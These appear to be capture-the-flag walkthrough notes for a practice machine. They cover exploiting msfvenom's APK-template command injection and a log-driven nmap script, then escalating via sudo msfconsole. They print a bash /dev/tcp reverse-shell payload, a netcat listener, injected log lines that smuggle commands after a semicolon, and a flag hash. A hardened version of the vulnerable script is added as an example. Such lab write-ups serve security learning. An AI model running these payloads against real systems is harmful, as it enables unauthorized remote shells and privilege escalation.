Open ports: 22/ssh, 5000/http
![[Pasted image 20210416211309.png]]

Visiting 10.10.10.226:5000
![[Pasted image 20210416211429.png]]
This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x
https://www.exploit-db.com/exploits/49491
```bash
nc -nvlp 1337
```

```python
payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"'
```
![[Pasted image 20210416211608.png]]
user flag: c3728a7c05e95bb566784da579a2c887
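```bash
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
# Field 3 onward of each log line is treated as an IP address, with no validation.
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    # ${ip} is interpolated into a string that sh -c parses, so shell
    # metacharacters in the log entry are executed as commands.
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

# Truncate the log once it has been processed.
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```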
`vim /home/kid/hacker`

```
t t 127.0.0.1; touch hhh.txt;
```

Insert ";" into searchsploit user input.

```
t t 127.0.0.1;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1'; >> hacker
```
![[Pasted image 20210416235654.png]]
![[Pasted image 20210416235635.png]]
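A hardened form of the log-processing loop above, as an added example that is not part of the original notes or the box's own script: each log field is validated as an IPv4 address and passed to nmap as a plain argument instead of through `sh -c`. The function names and the sample log lines are assumptions constructed for this example.

```bash
#!/bin/bash
# Added example: hardened version of the log-driven scan loop.
# Uses only POSIX sh constructs, so it also runs under sh.

# Succeeds only for a dotted-quad IPv4 address. The body is a subshell, so the
# IFS change and positional parameters do not leak into the caller.
is_ipv4() (
    case $1 in
        '' | *[!0-9.]* | .* | *. | *..*) exit 1 ;;
    esac
    IFS=.
    set -- $1                  # split on dots; input is digits and dots only
    [ $# -eq 4 ] || exit 1
    for octet in "$@"; do
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || exit 1
    done
)

# Print the unique, validated addresses from field 3 onward of each log line.
# Anything that is not a bare IPv4 address is reported on stderr and dropped.
valid_targets() {
    cut -d' ' -f3- "$1" | LC_ALL=C sort -u | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            echo "rejected malformed log entry" >&2
        fi
    done
}

# Scan each validated address into directory $2. nmap receives its arguments
# directly as argv; no "sh -c" string is built, so nothing from the log is
# ever parsed as shell syntax.
scan_targets() {
    valid_targets "$1" | {
        while IFS= read -r ip; do
            nmap --top-ports 10 -oN "$2/$ip.nmap" "$ip" >/dev/null 2>&1 &
        done
        wait
    }
}

# Constructed sample log: two clean entries plus the test line from the notes.
sample_log=$(mktemp)
printf '%s\n' 't t 10.10.16.25' 't t 127.0.0.1; touch hhh.txt;' \
    't t 192.168.1.7' > "$sample_log"
valid_targets "$sample_log"    # prints only the two clean addresses
rm -f "$sample_log"
```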
Easy priv esc: Metasploit's msfconsole allows you to execute system commands from within the console.

```bash
sudo /opt/metasploit-framework-6.0.9/msfconsole
```
![[Pasted image 20210416235933.png]]